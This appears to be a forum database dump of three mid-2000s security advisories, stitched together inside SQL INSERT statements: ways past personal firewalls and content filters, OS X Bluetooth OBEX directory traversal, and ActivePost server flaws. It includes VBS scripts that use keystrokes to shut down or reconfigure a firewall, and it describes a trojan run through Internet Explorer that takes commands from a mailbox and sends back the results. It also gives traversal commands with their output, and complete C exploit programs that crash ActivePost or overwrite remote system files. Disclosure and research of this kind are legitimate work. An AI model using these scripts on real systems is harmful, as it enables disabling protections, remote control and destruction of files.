Affected products:
CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application
Intelligence
(R55) HFA 9
Microsoft Windows XP SP2
Agnitum Outpost Pro 2.1, 2.5
Tiny Firewall Pro v6.0.100
ZoneAlarm Pro with Web Filtering v4.5.594
BlackICE PC Protection 3.6
Kerio Personal Firewall 4.0
WRQ ATGuard 3.2

Topic: Bypassing client application protection techniques
Category: Protection bypass
Affected products:
CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application
Intelligence
(R55) HFA 9
Microsoft Windows XP SP2
Agnitum Outpost Pro 2.1, 2.5
Tiny Firewall Pro v6.0.100
ZoneAlarm Pro with Web Filtering v4.5.594
BlackICE PC Protection 3.6
Kerio Personal Firewall 4.0
WRQ ATGuard 3.2
Authors:
offtopic, <offtopic@mail.ru>
3APA3A, <3APA3A@security.nnov.ru>

Original link:
http://www.security.nnov.ru/advisories/bypassing.asp Special thanks to Igor U. Miturin for testing and coordinatingCheckpoint issues, to Checkpoint for cooperation, to Agnitum for"opossum" topic public debates and some ideas.


Disclaimer:

</SARCASM>
This article is neither attempt to teach scriptkiddies to write trojansnor attempt to create one by authors. It's a call to security communityto activate discussion on protection techniques for Internet clientapplication security. Yes, we want to fire a flame. We apologies we didnot contacted vendors on many issues they may consider as securityvulnerabilities in their products. We believe, to solve discussedproblem instead of fixing illustrating PoCs, all products must bearchitecturally changed, not patched. Before architectural change anyschoolboy with scripting skills can get access to corporate networkprotected by advertised product. We share a point of view, this should not be treated as product vulnerability.
<SARCASM>
<APPLAUSE />
(yes, pedram).



1. Introduction

1.1 Front end security

Last years were revolutionary for network services infrastructure security. In addition to more secure and stable operation systems and services, we've got a lot of industrial solutions - stateful firewalls with level 7 inspection, intrusion detection and intrusion prevention systems, reliable clusters and distributed solutions to fight DDoS attacks... And we got actually nothing in the field of client application protection. Security of client network applications, such as browsers, mail and instant messaging agents is on the same level it was 5 years ago, and things became worse, because these applications are now critical for business, we can not simply stop using e-mail. <APPLAUSE />

Client application security is very important, because same application can be used to process untrusted, potentially dangerous data as well as sensitive information. <OBJECTIONS FROM HALL, LEFT UNANSWERED />

We, as many security professionals, have a feeling industry moves to wrong direction in the area of client application security.

To demonstrate this point of view, this article was written. We discuss some methods of breaking into managed, protected corporate network without any special skills. "Exploits" illustrating this article were written with notepad.exe.

1.2 What do you use to protect your client systems against Internet attack?

There are very few widely deployed techniques. Among them are: content filtering on corporate firewall (including antiviral filtering) and personal antiviruses and personal firewalls (PFW). In addition to content filtering personal firewalls implement integrity control for applications and system by controlling integrity of the files, blocking access to some API functions and limiting network access to only trusted applications.

Of cause, there are few really interesting approaches to secure client applications, some of them are discussed later, but usually these techniques are not generally used.

1.3 What will we demonstrate.

We will not teach you how to attack any specific client application.
Latest Mozilla experience demonstrate, security bug in client application can always be found for approximately $500 (should we talk about Internet Explorer? Mozilla goes with discounted price because not demanded on zombi market). We will try to illustrate, that $500 is, probably, all that required to get access to your network. It doesn't depend on protection techniques listed above, because protection can be bypassed by any schoolboy. If this protection is all you have, you have no protection at all. In fact, iDefense makes more for community than any PWF vendor (it's not a joke): it pays for newly discovered security issue more than shadow market does. At least you have additional $500 to your security this way.
<LAUGHING, OBJECTIONS (LEFT UNANSWERED), APPLAUSE />
</SARCASM>
Problem of paid vulnerability research is not black-and-white like one can believe. Without commercial software or commercial services freeware would not survive, because good programmer needs money. Same tendencies are in vulnerability research. C'est la vie. We can discuss it.
<SARCASM>
Full-disclosure? Who believe in it...

So, we proudly present you how to:

Bypass content filtering for corporate and personal firewall
(yes,
again, and again and again).
Bypass network access protection for personal firewall
Bypass integrity protection for personal firewall or antivirus.

Above is a list of tested products. It's incomplete. Some vendors were contacted and replied. Some fixes were published, but none of contacted vendors was able to fix all problems discussed. We do not belive it's possible in nearest future to prevent corporate network protected only with firewalls, personal firewalls and antiviruses from being hacked by the schoolboy.

<DEEP SILENCE />
<PUTTING MEAN BLACK HATS ON />
2. Bypassing content filtering again and again and again
____________________________________________________________
Axiom: there is always one more way to bypass content filter.

Explanation: because content filter and client application use different algorithms for data processing, there is always data processed differently by client application and content filter.


2.1 Configuration used

In our configuration we used content filtering features of 2 firewalls:
Checkpoint as corporate firewall and Agnitum Outpost Pro as a personal firewall. Both firewalls were set to filter scripting and ActiveX elements. By using few techniques described in [1] we wrote a set of tests to attack Internet Explorer protected by these 2 firewalls (and additionally with 2 different antiviruses) on 2 different levels to execute javascript.

2.2 Test descriptions:

2.2.1 http://www.security.nnov.ru/files/opossum/test1.html Problem with special characters (0x0B) demonstrated. [1].II.9

2.2.2 http://www.security.nnov.ru/files/opossum/test2.html Problem with RFC2781 decoding (UTF-16, little endian). [1].II.1

2.2.3 http://www.security.nnov.ru/files/opossum/test3.html Problem with RFC2781 decoding (UTF-16, big endian). [1].II.1

2.2.4 http://www.security.nnov.ru/files/opossum/test4.gif Different approach of different clients to content type definition [1].II.13

2.2.5 http://www.security.nnov.ru/files/opossum/test5.gif Same as 2.2.4 + exploitation of stream buffering.

2.2.6 http://www.security.nnov.ru/files/opossum/test6.html Problem with special characters (0x00) demonstrated. [1].II.9

2.2.7 http://www.security.nnov.ru/files/opossum/test7.asp Inability to parse UTF-7 encoding (with Content-Type) [1].II.2

2.2.8 http://www.security.nnov.ru/files/opossum/test8.html Inability to parse UTF-7 encoding (with Meta http-equiv) [1].II.2

2.2.9 http://www.security.nnov.ru/files/opossum/test9.html Inability to catch scripting via expression(). Was described by http-equiv (malware.com).

2.2.10. http://www.security.nnov.ru/files/opossum/test10.html Inability to catch scripting in styles [1].II.15

2.2.11 http://www.security.nnov.ru/files/opossum/test11.mht Inability to parse MHT files (RFC 2557)

Content filtering bypass techniques used are known for years. Outpost failed all tests. Checkpoint failed 2.2.2, 2.2.3, 2.2.6, 2.2.8, 2.2.9, 2.2.10, 2.2.11.

2.3 Vendors:

Both Checkpoint and Agnitum were contacted. Checkpoint covers issues discussed in R55HFA10. 2.2.10 and 2.2.11 additionally require disabling CSS and MHT with special settings (I do not believe it can be accepted as solution). Agnitum fixes very few issues in Outpost 2.5 version. Please, check your own content filter before blaming Agnitum or Checkpoint.

3. Bypassing network access restrictions with trusted application
____________________________________________________________
Axiom: Malware is undistinguishable from user application

Next step after successful client application attack is usually getting remote control on attacked computer.

Personal firewall usually restricts access to network to the list of allowed application. In addition, integrity of these applications is controlled to prevent code insertion into executable file. It makes it impossible to install trojan application with direct network access.

Common idea behind bypassing this protection is using trusted application (for example browser) to access external network. Usually, execution flow of target application with DLL injection technique,

WriteProcessMemory(), CreateRemoteThread() or something like this. You can find description in [1] and [2]. These methods require programming skills, additionally, personal firewall could set a hooks to protect against this kind of attack. Additionally, trojan application in this case should implement almost all network functions, including network topology discovery and proxy communication.

Additionally, access of client application can be limited only to a list of trusted sites. Our approach is very simple. We call it CAT (Client Application Trojaning). We use trusted application itself without attempt to hack into it's code.. http://www.security.nnov.ru/files/opossum/CAT.zip is simple PoC application. CAT uses COM to launch and control client application (Internet Explorer). This allows practically full access to the IE recourses, so we can ask IE to navigate to our site, and IE will use its proxy's and other settings. We don't need to include http-client code in our application - IE does all work for us. Another interesting thing - it's a work via trusted sites. In our example Trojan uses www.mail.ru server to communicate with bad guy, but it easy to use other trusted network services, for example

Google's proxy (http://translate.google.com/translate?h ... phrack.org). Additionally almost any search system can be used as proxy with only limitation that each iteration may require few days.

This CAT PoC works as next:

- It creates IE COM object, navigates to www.mail.ru site.
- CAT passes username and password to the site, and gets access to mailbox
- CAT sends notification message "ready" to specified mailbox
- Every 20 seconds CAT checks mailbox for messages with XXX.request subject (XXX - integer number).
- If message appears in mailbox, CAT reads it, deletes message, and process it's data as a batch file.
- Execution results are send to predefined account.

remove IE.Visible = true
line to run application in hidden mode.

All this great functionality lies in 100 lines of VBS. You see, Basic can be more effective than assembler.
<ARE NOT WE SCRIPTKIDDIES IN IMAGINARY BLACK HATS?> ILOVEYOU and another scripting viruses demonstrated application like this can be written by 14 y.o. schoolboys. VBS can be executed from Microsoft Office applications, Windows Explorer, Internet Explorer, etc. All personal firewalls tested, except Outpost 2.5 failed to detect information leak with this script. Outpost 2.5 requires minor modification for original script to start one additional IE instance before launching IE via COM, script modification is set as homework.

4. Bypassing personal firewall integrity protection
____________________________________________________________
Axiom: Malware is undistinguishable from user

This script unloads Outpost firewall (any version)

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost
Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

Another one creates a rule to permit Internet access for all applications

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost
Firewall\outpost.exe"
WScript.Sleep 100
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 10
WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
WScript.Sleep 10
WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"
WScript.Sleep 10
WShell.SendKeys "a{ENTER}"
WScript.Sleep 10
WShell.SendKeys "{F10}{LEFT}{DOWN}"
WScript.Sleep 10
WShell.SendKeys "n"

<APPLAUSE, BRAVOS />
<MEAN HATS OFF />

5. Final noise.
____________________________________________________________
Axiom: There is no cure against unknown Malware. There are no Axioms in client application protection.

The only way to somehow secure client application is implementing sandbox for any application to work with untrusted data. There are attempts to implement such sandbox without limiting it's functionality, for example GeSWall [4](by the way this project is looking for sponsor on investor). There are few commercial solutions of this kind, I do not believe any of this solution provides reliable security for Internet client application. Virtual machines for most architectures also have known flaws. Most reliable way to protect client application for now is creation of additional DMZ for application servers and providing terminal access to untrusted applications inside DMZ. Configuration example can be found in [5]. Of cause, this approach is not 100% reliable too.

That's all.

<LONG APPLAUSE, OBJECTIONS FROM HALL (LEFT UNANSWERED), A COUPLE OF WELL ANSWERED ROTTEN EGGS />

6. Links:
[1] 3APA3A, Bypassing content filtering software http://www.security.nnov.ru/advisories/content.asp
[2] Firewall leak tester http://www.firewallleaktester.com/
[3] rattle, Using Process Infection to Bypass Windows Software Firewalls http://www.phrack.org/show.php?p=62&amp;a=13
[4] GeSWall (General Systems Wall) http://www.securesize.com/
[5] offtopic, 3APA3A, "In front of front-end security" http://www.linuxchile.cl/docs.php?op=ver&amp;id=65

<WARNING: SARCASM tag was not open within document \>
<WARNING: SARCASM tag was not closed within document \>

--
/3APA3A')
INSERT INTO h4cky0u_posts_text ( post_id, bbcode_uid, post_subject, post_text) VALUES ('52','3220e5a7be','Apple OS X Multiple Bluetooth Vulnerabilities','Apple OS X's Bluetooth file exchange service is enabled by default on systems with Bluetooth capability. This could allow files to be shared without properly notifying the user. In addition, the default directory for file sharing may be used by other applications, leading to unintentional file sharing.

Vulnerable Systems:
* Mac OSX version 10.3.9 and prior

The Apple bluetooth implementation's default behavior is that the OBEX FTP
service allowed access to the /Users/Shared directory and it did not
require any sort of user authentication. In addition to it being enabled
by default once a user had logged into the machine.

The following output demonstrates the ability to view files located in
/Users/Shared:
animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7
-l
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<folder name="Faxes" created="19961103T141500Z" size="0"/>
<folder name="New Folder" created="19961103T141500Z" size="0"/>
<folder name="SC Info" created="19961103T141500Z" size="0"/>
</folder-listing>

Further, it appears that several applications use /Users/Shared as a
config file repository. For example it was found that GarageBand, Quicken,
Microsoft RDP client, Blizzard World of Warcraft and iTunes dumped random
files into /Users/Shared. Even 'SC Info.sidb' aka the iTunes database of
decryption keys are stored under this directory available for grabbing
over Bluetooth.

In addition to being able to browse the files located in /Users/Shared you
also have the ability to place files onto the machine in the same
directory. This may for example allow you to place potentially offensive
or illegal material onto an individuals computer.

Aside from offering OBEX File Transfer OSX the bluetooth interface offers
OBEX Object Push services. Object push is usually used for passing
business cards to other Bluetooth users. The object push has an option
called "Folder for Accepted Items". Under normal circumstances all files
should be dropped into this directory, however this restriction is can be
bypassed. OBEX Object Push services appears to be vulnerable to a
directory transversal attack.

The first step is obviously to check what channel OPUSH is on.
animosity:/home/kfinisterre# sdptool browse 00:11:B1:07:BE:A7
Browsing 00:11:B1:07:BE:A7 ...
Service Name: Bluetooth-PDA-Sync
Service RecHandle: 0x10004
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10002
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10003
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Fire up an rfcomm connection.
animosity:/home/kfinisterre# rfcomm connect 0 00:11:B1:07:BE:A7 10
Connected /dev/rfcomm0 to 00:11:B1:07:BE:A7 on channel 10
Press CTRL-C for hangup

Drop a file in /tmp.
kfinisterre@animosity:~/ussp-push-0.3$ ./ussp-push /dev/rfcomm0 /etc/hosts
./../../../../../../../../tmp/blah
pushing file /etc/hosts
name=/etc/hosts, size=257
Registered transport

set user data

created new objext

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ../../../../../../../../../tmp/blah, path: /etc/hosts, size:
257

At this point the Mac user is prompted by a window with the title
'Incoming File Transfer'. The options are to 'Decline' or 'Accept' with
the ability to also 'Accept all without warning' by clicking a check box.
There is a bluetooth icon with the device name of the connecting machine.
The device name information is even more useful as it can be used to
induce the user to click on the 'Accept' button.

Consider the following as an example:
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Sexy*Blonde*5*tables*over
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Critical*Apple*Bluetooth*Update
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Apple*Update*Please*Click*Accept

Luckily for an attacker only the basename() form of the file being
transfered is shown. In the above example all we would see is 'blah' as
the incoming filename. Odds are that most 'toothy' males would accept any
file from the Sexy Blonde 5 tables over.

After you coax the user to accept the file either via clicking 'Accept' or
pressing enter the above it will promptly be dropped in /tmp.

Kevin-Finisterres-Computer:~kevinfinisterre$ ls /tmp
501 blah mcx_compositor

In addition to the above vulnerabilities, the OBEX File Transfer service
is also vulnerable to directory transversal.

animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7
-l -c ../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<file name="4D WebSTAR Installer.log" created="19961103T141500Z"
size="195662"/>
<folder name="johnh" created="19961103T141500Z" size="0"/>
<folder name="kevinfinisterre" created="19961103T141500Z" size="0"/>
<folder name="Shared" created="19961103T141500Z" size="0"/>
<folder name="webstar" created="19961103T141500Z" size="0"/>
</folder-listing>

animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7
-l -c ../../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<folder name="Applications" created="19961103T141500Z" size="0"/>
<folder name="automount" created="19961103T141500Z" size="0"/>
<folder name="bin" created="19961103T141500Z" size="0"/>
<folder name="cores" created="19961103T141500Z" size="0"/>
<file name="Desktop DB" created="19961103T141500Z" size="3584"/>
<file name="Desktop DF" created="19961103T141500Z" size="4482"/>
<folder name="dev" created="19961103T141500Z" size="0"/>
<folder name="Developer" created="19961103T141500Z" size="0"/>
<file name="etc" created="19961103T141500Z" size="11"/>
<folder name="Library" created="19961103T141500Z" size="0"/>
<file name="mach" created="19961103T141500Z" size="9"/>
<file name="mach.sym" created="19961103T141500Z" size="570532"/>
<file name="mach_kernel" created="19961103T141500Z" size="3863716"/>
<folder name="Network" created="19961103T141500Z" size="0"/>
<folder name="private" created="19961103T141500Z" size="0"/>
<folder name="sbin" created="19961103T141500Z" size="0"/>
<folder name="System" created="19961103T141500Z" size="0"/>
<file name="tmp" created="19961103T141500Z" size="11"/>
<folder name="Users" created="19961103T141500Z" size="0"/>
<folder name="usr" created="19961103T141500Z" size="0"/>
<file name="var" created="19961103T141500Z" size="11"/>
<folder name="Volumes" created="19961103T141500Z" size="0"/>
</folder-listing>

Disclosure Timeline:
Thu, 10 Mar 2005 Follow-up: 7841131 assigned by auto ticketing sytem.
Sat, 12 Mar 2005 dispute usage of /Users/Shared with bluetooth with Apple.
Thu, 17 Mar 2005 Apple is 'still investigating this issue'. Introduce
greenplaque to Apple.
Sat, 19 Mar 2005 Justin Tibbs (jay ex tizzle) pointed out World of
Warcraft uses /Users/Shared
Sat, 19 Mar 2005 JxT and KF discover and report that iTunes leaves its
auth db in /Users/Shared
Sun, 20 Mar 2005 OBEX Object Push directory transversal issues discovered
and reported.
Mon, 04 Apr 2005 OBEX File transfer daemon flaws and reported
Sat, 09 Apr 2005 More Apple followups
Thu, 23 Apr 2005 AppleSeed testing begins

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1332>
CAN-2005-1332

ADDITIONAL INFORMATION

The information has been provided by kf_lists@digitalmunition.com
KF.')
INSERT INTO h4cky0u_posts_text ( post_id, bbcode_uid, post_subject, post_text) VALUES ('53','e0d0aefb01','ActivePost Standard Password Disclosure, Directory Traversal','Multiple vulnerabilities exists in ActivePOST, exploiting these allows malicious attacker to gather valuable information about the system and to cause the program's service to crash.

Vulnerable Systems:
* ActivePost Standard versions 3.1 and prior

Denial of Service:
The file-server runs on port 6004 and is used to upload files on the server so they can then be downloaded by the target users. The vulnerability stems from the fact that an attacker is able to crash the file-server by providing a filename that is longer than 4074 characters.

Directory Traversal:
This is the most critical vulnerability as it lets an attacker to upload malicious files anywhere in the disk on which ActivePost was installed. This happens by exploiting a directory traversal bug in the filename.

Example:
The following filename will overwrite the calc.exe file: /../../../windows/calc.exe

Conference Password Disclosure:
Every time a user enters in the conference menu, the server sends all the informations of the available rooms including the plain-text passwords of the conference rooms that are password protected.

The following example data received from the server:
4703 0000 0000 0000 0000 0000 0000 0000 G...............
0000 0000 0a72 6f6f 6d20 7469 746c 6500 .....room title.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0001 3100 ..............1.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0e73 6563 7265 7470 6173 7377 6f72 ...secretpasswor <===
6400 0000 0000 0000 0000 0000 0000 0000 d...............
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0003 3832 ..............82
3100 0000 0000 0000 0000 0000 0000 0000 1...............
0000 0138 0000 0000 0000 0000 0000 0000 ...8............
0000 0000 0000 0017 6465 7363 7269 7074 ........descript
696f 6e20 6f66 2074 6865 2072 6f6f 6d00 ion of the room.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 ....

Proof of Concept:
ActivePost Denial of Service:
[code:1:e0d0aefb01]/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/actpboom.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include winerr.h

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif

#define VER 0.1
#define PORT 6004
#define BUFFSZ 4104 /* don't modify! */
#define TIMEOUT 3

#define SEND if(send(sd, buff, BUFFSZ, 0) \
< 0) std_err();
#define RECV for(tot = 0; tot < BUFFSZ; tot += len) { \
len = recv(sd, buff + tot, BUFFSZ - tot, 0); \
if(len < 0) std_err(); \
if(!len) break; \
}

int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
tot;
u_short port = PORT;
u_char buff[BUFFSZ];

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &amp;wsadata);
#endif

setbuf(stdout, NULL);

fputs(\n
ActivePost File-Server <= 3.1 crash VER\n
by Luigi Auriemma\n
e-mail: aluigi@autistici.org\n
web: http://aluigi.altervista.org\n
\n, stdout);

if(argc < 2) {
printf(\nUsage: %s <server> [port(%d)]\n
\n, argv[0], PORT);
exit(1);
}

if(argc > 2) port = atoi(argv[2]);

peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf(\n- target %s:%hu\n,
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();

if(connect(sd, (struct sockaddr *)&amp;peer, sizeof(peer))
< 0) std_err();

memset(buff, 0x00, BUFFSZ);

fputs(- send first header\n, stdout);
*(u_long *)buff = 0x1f5;
SEND;
RECV;

fputs(- send filename (BOOM)\n, stdout);
*(u_long *)buff = 0x1f6;
memset(buff + 8, 'a', BUFFSZ - 8);
SEND;
RECV;

memset(buff, 0x00, BUFFSZ);

fputs(- send file data (none)\n, stdout);
*(u_long *)buff = 0x1f8;
SEND;

fputs(- send final header\n, stdout);
*(u_long *)buff = 0x1f9;
SEND;

if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) {
fputs(\nServer IS vulnerable!!!\n\n, stdout);
} else {
fputs(\nServer doesn't seem vulnerable\n\n, stdout);
}

close(sd);
return(0);
}

int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&amp;fd_read);
FD_SET(sock, &amp;fd_read);
err = select(sock + 1, &amp;fd_read, NULL, NULL, &amp;tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf(\nError: Unable to resolve hostname (%s)\n, host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror(\nError);
exit(1);
}
#endif

ActivePost Directory Traversal:
/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/actpup.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
#include <winsock.h>
#include winerr.h

#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#endif

#define VER 0.1
#define PORT 6004
#define BUFFSZ 4104 /* don't modify */

#define SEND if(send(sd, buff, BUFFSZ, 0) \
< 0) std_err();
#define RECV for(tot = 0; tot < BUFFSZ; tot += len) { \
len = recv(sd, buff + tot, BUFFSZ - tot, 0); \
if(len < 0) std_err(); \
if(!len) break; \
}

u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
FILE *fd;
struct sockaddr_in peer;
int sd,
len,
tot;
u_short port = PORT;
u_char buff[BUFFSZ];

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &amp;wsadata);
#endif


setbuf(stdout, NULL);

fputs(\n
ActivePost File-Server <= 3.1 traversal file uploader VER\n
by Luigi Auriemma\n
e-mail: aluigi@autistici.org\n
web: http://aluigi.altervista.org\n
\n, stdout);

if(argc < 4) {
printf(\nUsage: %s <local_filename> <remote_filename> <server>
[port(%d)]\n
\n
local_filename is the name of one of your local files that
you wanna put on\n
the remote server.\n
remote_filename instead is the name you wanna give to the
file and moreover\n
the traversal pattern (/..) to reach the desired path on
which to put it.\n
Are needed at least 3 patterns to exit from the ActivePost
Server folder,\n
like /../../../filename or /..../filename\n
However don't worry because the complete real remote path
on which your file\n
is saved is EVER visible in the server reply.\n
\n
Examples:\n
%s evil.exe /../../../windows/calc.exe localhost\n
%s evil.exe /..../windows/calc.exe localhost\n
\n
In this case your file evil.exe will overwrite the calc.exe
file of the\n
remote host (if ActivePost has been installed in c:\\).\n
\n, argv[0], PORT, argv[0], argv[0]);
exit(1);
}

printf(- open local file \%s\\n, argv[1]);
fd = fopen(argv[1], rb);
if(!fd) std_err();

if(argc > 4) port = atoi(argv[4]);

peer.sin_addr.s_addr = resolv(argv[3]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf(- target %s:%hu\n,
inet_ntoa(peer.sin_addr),
port);

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();

if(connect(sd, (struct sockaddr *)&amp;peer, sizeof(peer))
< 0) std_err();

memset(buff, 0x00, BUFFSZ);

fputs(- send first header\n, stdout);
*(u_long *)buff = 0x1f5;
SEND;
RECV;

printf(- send filename (%s)\n, argv[2]);
*(u_long *)buff = 0x1f6;
strncpy(buff + 8, argv[2], BUFFSZ - 8);
SEND;
RECV;

printf(- upload file (%s)\n, argv[1]);
*(u_long *)buff = 0x1f8;
while((len = fread(buff + 8, 1, BUFFSZ - 8, fd))) {
*(u_long *)(buff + 4) = len;
SEND;
}
fclose(fd);

memset(buff, 0x00, BUFFSZ);

fputs(- send final header\n, stdout);
*(u_long *)buff = 0x1f9;
SEND;

RECV;
printf(- remote file has been saved exactly here:\n
%s\n, buff + 8);

close(sd);
fputs(- finished\n\n, stdout);
return(0);
}

u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf(\nError: Unable to resolve hostname (%s)\n, host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror(\nError);
exit(1);
}
#endif